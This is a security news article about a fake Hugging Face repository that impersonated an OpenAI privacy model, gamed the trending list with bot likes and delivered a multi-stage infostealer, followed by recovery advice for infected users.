The AI Supply Chain Trap: How a Fake OpenAI Repo Hijacked Hugging Face 🛡️

The rapid evolution of Artificial Intelligence has created a "gold rush" atmosphere where developers are eager to integrate the latest models into their workflows. However, this enthusiasm has birthed a dangerous new frontier for cybercriminals: the AI supply chain attack. Recently, a sophisticated campaign proved just how easy it is to deceive even the most tech-savvy users by turning the industry’s most trusted platform into a playground for malware.

The Illusion of Credibility: The Rise of Open-OSS

In late April, OpenAI released "Privacy Filter," an open-weight model designed to help developers protect user data by automatically redacting personally identifiable information (PII). It was a highly anticipated tool that quickly gained traction.

Seeing an opportunity, bad actors created a fake Hugging Face account under the moniker "Open-OSS." They published a repository also named privacy-filter that was, for all intents and purposes, a mirror image of the official OpenAI version. The "model card" and README were copied word-for-word, creating a perfect digital forgery.

The deception worked with terrifying efficiency. In less than 18 hours, the fake repository climbed to the #1 spot on Hugging Face’s trending page, amassing approximately 244,000 downloads and hundreds of likes.

How the Algorithm Was Gamed

You might wonder how a fake repository could outperform legitimate tools so quickly. The answer lies in "manufactured social proof." Security firm HiddenLayer, which investigated the incident, discovered that out of the 667 likes the repo received, 657 came from bot accounts with predictable, auto-generated names.

By using a botnet to inflate download numbers and likes, the attackers tricked the Hugging Face trending algorithm. This gave the repository a veneer of community-vetted legitimacy, leading real developers to trust and download the malicious files without a second thought.

Inside the Payload: A Six-Stage Infostealer

The malware was far more than a simple script; it was a sophisticated, multi-stage operation designed to evade detection and strip a victim's digital life bare.

The "Candy Coating"

When a user ran loader.py (for Mac/Linux) or start.bat (for Windows), the script displayed fake model training output. Developers saw progress bars and synthetic datasets—the exact visual feedback they would expect when loading an AI model.

The Hidden Chain

While the user watched the fake progress bars, the script was busy in the background:

1. Security Bypass: It quietly disabled security checks and leveraged PowerShell to run hidden commands.
2. Dynamic Execution: It pulled encoded instructions from a public JSON "paste" site. This allowed the attackers to change the malware's behavior without updating the Hugging Face repo.
3. Escalation: The script downloaded a custom infostealer written in Rust, added it to Windows Defender’s exclusion list, and launched it with SYSTEM-level privileges.

What Was Stolen?

The final payload was a "vacuum" for sensitive data. It targeted:

• Browsers: Saved passwords, session cookies, and encryption keys from Chrome and Firefox.
• Crypto Wallets: Seed phrases and private keys.
• Credentials: SSH keys and FTP logins.
• Privacy: It even took screenshots across all connected monitors.

Once the data was harvested, it was bundled into a compressed JSON file and shipped off to the attackers' servers. To make matters worse, the malware featured "anti-sandbox" checks; if it detected it was being analyzed by a security researcher in a virtual machine, it would simply shut down to remain undetected.

A Growing Pattern of AI Deception

This wasn't an isolated incident. The infrastructure used for this attack—specifically the domain api.eth-fastscan.org—has been linked to other malicious repositories under the name "anthfu," which impersonated popular models like DeepSeek and Qwen3.

This represents a shift in cybercrime tactics. Instead of trying to hack OpenAI’s servers, criminals are simply "poisoning the well" where developers gather. By exploiting the trust inherent in open-source communities, they can compromise thousands of machines with minimal effort.

What to Do If You Were Infected

If you downloaded the Open-OSS/privacy-filter repository and executed its files on a Windows machine, your system is compromised. Here is the recommended recovery path:

1. Isolate and Wipe: Stop using the machine immediately. The safest course of action is a complete drive wipe and OS reinstallation.
2. Reset Credentials: From a clean device, change every password stored in your browser. Invalidate Discord sessions and rotate OAuth tokens.
3. Secure Assets: Move any cryptocurrency funds to a brand-new wallet address. Assume any seed phrase stored on the infected machine is now in the hands of the attackers.
4. Burn Keys: Any SSH or FTP keys on the machine must be considered compromised and replaced immediately.

The AI era offers incredible tools for innovation, but the Hugging Face incident serves as a stark reminder: Always verify the publisher. In the world of open-source AI, a "trending" tag is no longer a guarantee of safety.

For more information on this security breach, read the original report on Decrypt:

👉 Fake OpenAI Repo Hit #1 on Hugging Face—And Stole Passwords While It Trended

Disclaimer: This article is provided for informational purposes only, mistakes may be made, and it's not offered or intended to be used as legal, tax, investment, financial, or any other advice.